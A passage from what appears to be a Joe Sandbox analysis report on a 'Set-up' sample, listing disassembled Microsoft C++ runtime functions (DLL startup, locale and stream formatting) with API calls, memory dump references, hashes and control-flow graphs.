                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: NameName::
                                                                                              • String ID: {flat}
                                                                                              • API String ID: 1333004437-2606204563
                                                                                              • Opcode ID: e5aa45e8ec103f22db68782cec6af65725c80779b17fcfd01f4b186736f67c31
                                                                                              • Instruction ID: 0c739a8ac37a3157152ef6466a41bfb269e2bf2ea9ca2d121425f8b2d408ff4c
                                                                                              • Opcode Fuzzy Hash: e5aa45e8ec103f22db68782cec6af65725c80779b17fcfd01f4b186736f67c31
                                                                                              • Instruction Fuzzy Hash: ABF065352542849FCB04CF98E445BE43FB4EB42796F058085EA4C0F252C77AD541CB95
                                                                                              Function 6BB9C644 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • std::exception::exception.LIBCMT(6BB9C69C), ref: 6BB9C660
                                                                                              • _CxxThrowException.MSVCR100(00010000,6BBFFE78,6BB9C69C), ref: 6BB9C675
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExceptionThrowstd::exception::exception
                                                                                              • String ID: version
                                                                                              • API String ID: 4279132481-3206337475
                                                                                              • Opcode ID: ee1c6b08f242ebb9b513c31de53fb5cbed85c9a4039126c51aca7813bcba4238
                                                                                              • Instruction ID: 4129ce310cc386aa0d34722cfda02e76d9c815764d3345220f47f5ef5f5840e1
                                                                                              • Opcode Fuzzy Hash: ee1c6b08f242ebb9b513c31de53fb5cbed85c9a4039126c51aca7813bcba4238
                                                                                              • Instruction Fuzzy Hash: 7AF015B1800288BACB10FF65E482BCE7F78EB06388F10D079E82957051DB7CD689CB95

                                                                                              Execution Graph

                                                                                              Execution Coverage:0.4%
                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                              Signature Coverage:0%
                                                                                              Total number of Nodes:103
                                                                                              Total number of Limit Nodes:4
                                                                                              execution_graph 16523 6bc43ce4 16524 6bc43cf4 16523->16524 16525 6bc43cef 16523->16525 16529 6bc43bc9 16524->16529 16541 6bc4411a 16525->16541 16528 6bc43d02 16530 6bc43bd5 ___DllMainCRTStartup 16529->16530 16534 6bc43c30 16530->16534 16536 6bc43bfc ___DllMainCRTStartup 16530->16536 16545 6bc439ba 16530->16545 16534->16536 16570 6bc440f1 16534->16570 16535 6bc43c60 16535->16536 16537 6bc439ba __CRT_INIT@12 19 API calls 16535->16537 16536->16528 16537->16536 16538 6bc440f1 _DllMain@12 DisableThreadLibraryCalls 16539 6bc43c57 16538->16539 16540 6bc439ba __CRT_INIT@12 19 API calls 16539->16540 16540->16535 16542 6bc4414c GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 16541->16542 16543 6bc4413f 16541->16543 16544 6bc44143 16542->16544 16543->16542 16543->16544 16544->16524 16549 6bc439fd 16545->16549 16550 6bc439cb 16545->16550 16546 6bc439f6 __IsNonwritableInCurrentImage 16546->16534 16547 6bc43ae0 InterlockedCompareExchange 16547->16550 16551 6bc43aea 16547->16551 16548 6bc43a33 InterlockedCompareExchange 16548->16549 16554 6bc43a3b 16548->16554 16549->16546 16549->16548 16553 6bc43a26 Sleep 16549->16553 16549->16554 16550->16546 16550->16547 16550->16551 16552 6bc43ad5 Sleep 16550->16552 16557 6bc43afd _amsg_exit 16551->16557 16558 6bc43b0a DecodePointer 16551->16558 16552->16547 16553->16548 16555 6bc43a50 _amsg_exit 16554->16555 16556 6bc43a59 _initterm_e 16554->16556 16559 6bc43a92 16555->16559 16556->16546 16560 6bc43a7c _initterm 16556->16560 16557->16546 16561 6bc43ba6 16558->16561 16562 6bc43b23 DecodePointer 16558->16562 16559->16546 16564 6bc43a9a InterlockedExchange 16559->16564 16560->16559 16561->16546 16563 6bc43bb2 InterlockedExchange 16561->16563 16565 6bc43b36 16562->16565 16563->16546 16564->16546 16566 6bc43b8c free _encoded_null 16565->16566 16567 6bc43b43 _encoded_null 16565->16567 16566->16561 16567->16565 16568 6bc43b4d DecodePointer _encoded_null 16567->16568 16569 6bc43b5f DecodePointer DecodePointer 16568->16569 16569->16565 16571 6bc440fc 16570->16571 16572 6bc43c43 16570->16572 16571->16572 16573 6bc44105 DisableThreadLibraryCalls 16571->16573 16572->16535 16572->16538 16573->16572 16574 6bc47c67 __iob_func ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE 16575 6bc47c94 16574->16575 16578 6bc43903 16575->16578 16581 6bc4385d 16578->16581 16580 6bc43910 16588 6bc43d50 16581->16588 16583 6bc43869 DecodePointer 16584 6bc4387f _onexit 16583->16584 16585 6bc4388b 7 API calls 16583->16585 16586 6bc438ec ___DllMainCRTStartup 16584->16586 16589 6bc438f5 _unlock 16585->16589 16586->16580 16588->16583 16589->16586 16590 6bc21247 16591 6bc21253 __EH_prolog3 16590->16591 16597 6bc3bae3 ??2@YAPAXI 16591->16597 16594 6bc21276 16600 6bc1bb86 16594->16600 16596 6bc2127d messages ctype 16605 6bc43176 InitializeCriticalSection 16597->16605 16599 6bc21266 ??2@YAPAXI 16599->16594 16599->16596 16606 6bc3b72a 16600->16606 16602 6bc1bb90 std::locale::_Getfacet 16622 6bc1b9e0 16602->16622 16605->16599 16607 6bc3b736 __EH_prolog3 16606->16607 16608 6bc3b7b1 messages 16607->16608 16627 6bc3b440 16607->16627 16608->16602 16611 6bc3b75a ??2@YAPAXI 16613 6bc3b76e 16611->16613 16614 6bc3b766 16611->16614 16634 6bc3b5cd 16613->16634 16631 6bc1bab6 16614->16631 16620 6bc1b9e0 std::locale::facet::_Incref 2 API calls 16621 6bc3b79b 16620->16621 16645 6bc3b46d 16621->16645 16623 6bc3b440 std::_Lockit::_Lockit EnterCriticalSection 16622->16623 16624 6bc1b9f3 16623->16624 16625 6bc3b46d std::ios_base::_Addstd LeaveCriticalSection 16624->16625 16626 6bc1ba07 16625->16626 16626->16596 16628 6bc3b452 16627->16628 16630 6bc3b460 16627->16630 16649 6bc431a0 EnterCriticalSection 16628->16649 16630->16611 16630->16621 16632 6bc1d90b _Yarn 3 API calls 16631->16632 16633 6bc1baee 16632->16633 16633->16613 16635 6bc3b5db 16634->16635 16636 6bc3b5ec 16634->16636 16650 6bc390a7 16635->16650 16638 6bc1d90b 16636->16638 16639 6bc1d91d 16638->16639 16640 6bc1d95d 16638->16640 16641 6bc1d921 free 16639->16641 16642 6bc1d929 16639->16642 16640->16620 16641->16642 16642->16640 16643 6bc1d93d malloc 16642->16643 16643->16640 16644 6bc1d951 memcpy 16643->16644 16644->16640 16646 6bc3b482 16645->16646 16647 6bc3b474 16645->16647 16646->16608 16653 6bc431b5 LeaveCriticalSection 16647->16653 16649->16630 16651 6bc390b5 abort 16650->16651 16652 6bc390bc EncodePointer 16650->16652 16651->16652 16652->16636 16653->16646

                                                                                              Executed Functions

                                                                                              Function 6BC21247 Relevance: 7.5, APIs: 5, Instructions: 24COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC2124E
                                                                                              • std::_Mutex::_Mutex.LIBCPMT(00000004), ref: 6BC21261
                                                                                                • Part of subcall function 6BC3BAE3: ??2@YAPAXI@Z.MSVCR100(00000018,?,6BC21266,00000004), ref: 6BC3BAEA
                                                                                                • Part of subcall function 6BC3BAE3: _Mtxinit.MSVCP100(00000000,00000018,?,6BC21266,00000004), ref: 6BC3BAF2
                                                                                              • ??2@YAPAXI@Z.MSVCR100(00000004,00000004), ref: 6BC2126C
                                                                                              • std::locale::locale.LIBCPMT ref: 6BC21278
                                                                                                • Part of subcall function 6BC1BB86: std::locale::_Init.LIBCPMT(?,6BC1D2B5,?,00000000,00000000), ref: 6BC1BB8B
                                                                                                • Part of subcall function 6BC1BB86: ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP100(?,6BC1D2B5,?,00000000,00000000), ref: 6BC1BB92
                                                                                                • Part of subcall function 6BC1BB86: std::locale::facet::_Incref.LIBCPMT(?,6BC1D2B5,?,00000000,00000000), ref: 6BC1BB99
                                                                                              • ?_Init@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@IAEXXZ.MSVCP100(00000004), ref: 6BC21286
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??2@$Getgloballocale@locale@std@@H_prolog3IncrefInitInit@?$basic_streambuf@_Locimp@12@MtxinitMutexMutex::_U?$char_traits@_W@std@@@std@@std::_std::locale::_std::locale::facet::_std::locale::locale
                                                                                              • String ID:
                                                                                              • API String ID: 1423025056-0
                                                                                              • Opcode ID: 9a461b435a50f083146edd48ea8e7f9c4d383fab2f7ff4e7b439504277791a5f
                                                                                              • Instruction ID: 6062337d9e69c3108fae3ace94daafc34f455f98d3860b1d7716be737d1020fd
                                                                                              • Opcode Fuzzy Hash: 9a461b435a50f083146edd48ea8e7f9c4d383fab2f7ff4e7b439504277791a5f
                                                                                              • Instruction Fuzzy Hash: 95E0D8B5B3472286DB24DBB8891271E75F06F90615F50046DA156DB780FF7CC740C765
                                                                                              Function 6BC47C67 Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • __iob_func.MSVCR100 ref: 6BC47C6B
                                                                                              • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP100 ref: 6BC47C7B
                                                                                                • Part of subcall function 6BC21247: __EH_prolog3.LIBCMT ref: 6BC2124E
                                                                                                • Part of subcall function 6BC21247: std::_Mutex::_Mutex.LIBCPMT(00000004), ref: 6BC21261
                                                                                                • Part of subcall function 6BC21247: ??2@YAPAXI@Z.MSVCR100(00000004,00000004), ref: 6BC2126C
                                                                                                • Part of subcall function 6BC21247: std::locale::locale.LIBCPMT ref: 6BC21278
                                                                                                • Part of subcall function 6BC21247: ?_Init@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@IAEXXZ.MSVCP100(00000004), ref: 6BC21286
                                                                                                • Part of subcall function 6BC21298: ?_Init@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@IAEXXZ.MSVCP100 ref: 6BC212AE
                                                                                                • Part of subcall function 6BC43903: __onexit.MSVCRT ref: 6BC4390B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Init@?$basic_streambuf@_U?$char_traits@_W@std@@@std@@$??0?$basic_streambuf@??2@D@std@@@std@@H_prolog3MutexMutex::_U?$char_traits@__iob_func__onexitstd::_std::locale::locale
                                                                                              • String ID:
                                                                                              • API String ID: 1300155456-0
                                                                                              • Opcode ID: d37608ce3340cb6206a2b277b46c9bd52465e9f73d52048106eb6ab44c3b7a13
                                                                                              • Instruction ID: 4147fe7b245663e0129ac2b251303f8ebb45683fa21b5437d13a9dc9ef0f6781
                                                                                              • Opcode Fuzzy Hash: d37608ce3340cb6206a2b277b46c9bd52465e9f73d52048106eb6ab44c3b7a13
                                                                                              • Instruction Fuzzy Hash: 4BD05B7623423027CB20172DBC06E5D3F75DBE6221F154125F515F7150EB7E6B0182A0

                                                                                              Non-executed Functions

                                                                                              Function 6BC3B33D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___lc_handle_func.MSVCR100 ref: 6BC3B357
                                                                                              • GetLocaleInfoW.KERNEL32(?,?,?,6BC25863), ref: 6BC3B360
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: InfoLocale___lc_handle_func
                                                                                              • String ID: 2
                                                                                              • API String ID: 3179915014-450215437
                                                                                              • Opcode ID: 7c20378d962dcf61b2739e95589e138e0eaa9ee0a59ac026d07042c97070186b
                                                                                              • Instruction ID: 5b3042c6715ed9d7cd72bfbb1798cabe10774ff6671adab2ca6002f8d842b825
                                                                                              • Opcode Fuzzy Hash: 7c20378d962dcf61b2739e95589e138e0eaa9ee0a59ac026d07042c97070186b
                                                                                              • Instruction Fuzzy Hash: 6CF0A736951518FACB02DB94D90BA8E73B8FB44398F608485E102E7081E7F8DF84D391
                                                                                              Function 6BC332F1 Relevance: 37.2, APIs: 20, Strings: 1, Instructions: 406stringCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 108 6bc332f1-6bc333a2 call 6bc437c6 ?getloc@ios_base@std@@QBE?AVlocale@2@XZ call 6bc2a952 call 6bc1bba7 call 6bc41491 call 6bc223ec 120 6bc333a4-6bc333a6 108->120 121 6bc333ae 108->121 120->121 122 6bc333a8-6bc333ac 120->122 123 6bc333b5-6bc333ea localeconv memchr * 2 121->123 122->123 124 6bc333ef-6bc333f6 123->124 125 6bc333ec 123->125 126 6bc333fb-6bc333fe 124->126 127 6bc333f8 124->127 125->124 128 6bc33505-6bc3351a 126->128 129 6bc33404-6bc3340b 126->129 127->126 132 6bc3352d 128->132 133 6bc3351c 128->133 130 6bc33410-6bc33413 129->130 131 6bc3340d 129->131 130->128 134 6bc33419-6bc33428 call 6bc3154b 130->134 131->130 137 6bc33531-6bc3353d 132->137 135 6bc33522-6bc33524 133->135 136 6bc3351e-6bc33520 133->136 148 6bc3342a-6bc33437 call 6bc21926 134->148 149 6bc33439-6bc3343d 134->149 135->132 141 6bc33526-6bc3352b 135->141 136->132 136->135 138 6bc33598-6bc335aa memchr 137->138 139 6bc3353f-6bc33545 137->139 144 6bc335b0-6bc33649 ?_Putgrouped@?$num_put@_WV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@2@V32@PBDI_W@Z ?_Rep@?$num_put@_WV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@2@V32@_WI@Z call 6bc24780 ?_Rep@?$num_put@_WV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@2@V32@_WI@Z 138->144 145 6bc3364c-6bc3365b memchr 138->145 142 6bc33570-6bc33595 ?_Rep@?$num_put@_WV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@2@V32@_WI@Z 139->142 143 6bc33547-6bc3354b 139->143 141->137 142->138 143->142 147 6bc3354d-6bc3356f ?_Putc@?$num_put@_WV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@2@V32@PBDI@Z 143->147 144->145 150 6bc33661-6bc336bb ?_Putgrouped@?$num_put@_WV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@2@V32@PBDI_W@Z ?_Rep@?$num_put@_WV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@2@V32@_WI@Z 145->150 151 6bc336e8-6bc33765 ?_Putgrouped@?$num_put@_WV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@2@V32@PBDI_W@Z ?_Rep@?$num_put@_WV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@2@V32@_WI@Z * 2 call 6bc211fc * 2 call 6bc4381a 145->151 147->142 164 6bc33460-6bc3346a 148->164 154 6bc33450-6bc3345b call 6bc306a2 149->154 155 6bc3343f-6bc3344c call 6bc21926 149->155 156 6bc336c2-6bc336e5 ?_Putc@?$num_put@_WV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@2@V32@PBDI@Z 150->156 157 6bc336bd 150->157 154->164 155->154 156->151 157->156 168 6bc33476-6bc33492 call 6bc306a2 * 2 164->168 169 6bc3346c-6bc33474 call 6bc21926 164->169 177 6bc33496-6bc334a1 168->177 169->177 180 6bc334a3 177->180 181 6bc334a6-6bc334ad 177->181 180->181 182 6bc334b2-6bc334c1 strcspn 181->182 183 6bc334af 181->183 184 6bc334ec-6bc334f0 182->184 183->182 185 6bc334c3-6bc334c5 184->185 186 6bc334f2-6bc334f9 184->186 185->186 187 6bc334c7-6bc334d1 185->187 188 6bc334fb 186->188 189 6bc334fe-6bc33502 186->189 187->186 190 6bc334d3-6bc334e8 call 6bc306a2 187->190 188->189 189->128 190->184 193 6bc334ea 190->193 193->184
                                                                                              APIs
                                                                                              • __EH_prolog3_GS.LIBCMT ref: 6BC332F8
                                                                                              • ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(00000000,00000078,6BC3726C,?,?,?,?,?,?,?,00000000,00000000,?,00000000), ref: 6BC33332
                                                                                                • Part of subcall function 6BC1CFBC: std::locale::facet::_Incref.LIBCPMT ref: 6BC1CFCC
                                                                                                • Part of subcall function 6BC2A952: __EH_prolog3.LIBCMT ref: 6BC2A959
                                                                                                • Part of subcall function 6BC2A952: std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC3E9EA,?), ref: 6BC2A963
                                                                                                • Part of subcall function 6BC2A952: int.LIBCPMT(00000000,00000014,6BC3E9EA,?), ref: 6BC2A97A
                                                                                                • Part of subcall function 6BC2A952: std::locale::_Getfacet.LIBCPMT ref: 6BC2A983
                                                                                                • Part of subcall function 6BC2A952: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC3E9EA,?), ref: 6BC2A9E3
                                                                                                • Part of subcall function 6BC1BBA7: std::locale::facet::_Decref.LIBCPMT(6BC3BAD4,?,?,6BC1D257), ref: 6BC1BBAD
                                                                                              • _Maklocchr.LIBCPMT ref: 6BC33390
                                                                                                • Part of subcall function 6BC223EC: _Mbrtowc.MSVCP100(00000000,00000000,00000001,00000000,6BC3C44E,?,?,?,6BC3C44E,?), ref: 6BC2240C
                                                                                              • localeconv.MSVCR100 ref: 6BC333B5
                                                                                              • memchr.MSVCR100 ref: 6BC333CC
                                                                                              • memchr.MSVCR100 ref: 6BC333DC
                                                                                              • strcspn.MSVCR100(00000000,?), ref: 6BC334B7
                                                                                              • ?_Putc@?$num_put@_WV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@2@V32@PBDI@Z.MSVCP100(?,?,?,?,?,00000001), ref: 6BC3355B
                                                                                              • ?_Rep@?$num_put@_WV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@2@V32@_WI@Z.MSVCP100(?,?,?,?,?,00000000), ref: 6BC33581
                                                                                              • memchr.MSVCR100 ref: 6BC3359F
                                                                                              • ?_Putgrouped@?$num_put@_WV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@2@V32@PBDI_W@Z.MSVCP100(?,?,?,?,?,00000000,?), ref: 6BC335C7
                                                                                              • ?_Rep@?$num_put@_WV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@2@V32@_WI@Z.MSVCP100(?,?,00000000,?,?,?,?,?,?,?,?,00000000,?), ref: 6BC335E7
                                                                                                • Part of subcall function 6BC24780: ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEG_W@Z.MSVCP100(?,?,?,6BC25408), ref: 6BC24792
                                                                                              • ?_Rep@?$num_put@_WV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@2@V32@_WI@Z.MSVCP100(?,?,?,?,?,?,?), ref: 6BC33633
                                                                                              • memchr.MSVCR100 ref: 6BC33650
                                                                                              • ?_Rep@?$num_put@_WV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@2@V32@_WI@Z.MSVCP100(?,?,00000000,?,?,?,?,?,?,?,?,00000000,?), ref: 6BC33698
                                                                                              • ?_Putc@?$num_put@_WV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@2@V32@PBDI@Z.MSVCP100(?,?,00000000,?,6BC11D18,00000001), ref: 6BC336CF
                                                                                              • ?_Putgrouped@?$num_put@_WV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@2@V32@PBDI_W@Z.MSVCP100(?,?,?,?,?,00000000,?), ref: 6BC33678
                                                                                                • Part of subcall function 6BC26665: memchr.MSVCR100 ref: 6BC2667A
                                                                                                • Part of subcall function 6BC26665: ?_Putc@?$num_put@_WV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@2@V32@PBDI@Z.MSVCP100(?,?,?,?,?,?), ref: 6BC2669E
                                                                                              • ?_Putgrouped@?$num_put@_WV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@2@V32@PBDI_W@Z.MSVCP100(?,?,?,?,?,?,?), ref: 6BC336F8
                                                                                              • ?_Rep@?$num_put@_WV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@2@V32@_WI@Z.MSVCP100(?,?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 6BC33718
                                                                                              • ?_Rep@?$num_put@_WV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@2@V32@_WI@Z.MSVCP100(?,00000000,?,?,?,00000000,?,?,00000000,?,?,?,?,?,?,?), ref: 6BC3373F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: U?$char_traits@_$V?$ostreambuf_iterator@_$W@std@@@2@W@std@@@std@@@std@@$Rep@?$num_put@_V32@V32@_$memchr$Putc@?$num_put@_Putgrouped@?$num_put@_$std::locale::facet::_$??1_?getloc@ios_base@std@@?sputc@?$basic_streambuf@_DecrefGetfacetH_prolog3H_prolog3_IncrefLockitLockit::_Lockit@std@@MaklocchrMbrtowcVlocale@2@W@std@@@std@@localeconvstd::_std::locale::_strcspn
                                                                                              • String ID: e
                                                                                              • API String ID: 828282170-4024072794
                                                                                              • Opcode ID: efb31072884cf7b2e3e1e889ae2f9670d911369e8aad7191783d8a1929c409d8
                                                                                              • Instruction ID: 3a7a2a1bf5f4ed503932754045c2e10b9ca8e222977c8c978cd46359fb0f9706
                                                                                              • Opcode Fuzzy Hash: efb31072884cf7b2e3e1e889ae2f9670d911369e8aad7191783d8a1929c409d8
                                                                                              • Instruction Fuzzy Hash: 9FF167B1D10219AFDF11CFE8C985AEEBBB9FF49304F008059E815AB251E7399A55CF60
                                                                                              Function 6BC3424E Relevance: 37.2, APIs: 20, Strings: 1, Instructions: 406stringCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 194 6bc3424e-6bc342ff call 6bc437c6 ?getloc@ios_base@std@@QBE?AVlocale@2@XZ call 6bc2a9f5 call 6bc1bba7 call 6bc41491 call 6bc223ec 206 6bc34301-6bc34303 194->206 207 6bc3430b 194->207 206->207 208 6bc34305-6bc34309 206->208 209 6bc34312-6bc34347 localeconv memchr * 2 207->209 208->209 210 6bc34349 209->210 211 6bc3434c-6bc34353 209->211 210->211 212 6bc34355 211->212 213 6bc34358-6bc3435b 211->213 212->213 214 6bc34462-6bc34477 213->214 215 6bc34361-6bc34368 213->215 216 6bc3448a 214->216 217 6bc34479 214->217 218 6bc3436a 215->218 219 6bc3436d-6bc34370 215->219 222 6bc3448e-6bc3449a 216->222 220 6bc3447b-6bc3447d 217->220 221 6bc3447f-6bc34481 217->221 218->219 219->214 223 6bc34376-6bc34385 call 6bc3154b 219->223 220->216 220->221 221->216 224 6bc34483-6bc34488 221->224 225 6bc344f5-6bc34507 memchr 222->225 226 6bc3449c-6bc344a2 222->226 236 6bc34387-6bc34394 call 6bc21926 223->236 237 6bc34396-6bc3439a 223->237 224->222 230 6bc345a9-6bc345b8 memchr 225->230 231 6bc3450d-6bc345a6 ?_Putgrouped@?$num_put@_WV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@2@V32@PBDI_W@Z ?_Rep@?$num_put@_WV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@2@V32@_WI@Z call 6bc24780 ?_Rep@?$num_put@_WV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@2@V32@_WI@Z 225->231 228 6bc344a4-6bc344a8 226->228 229 6bc344cd-6bc344f2 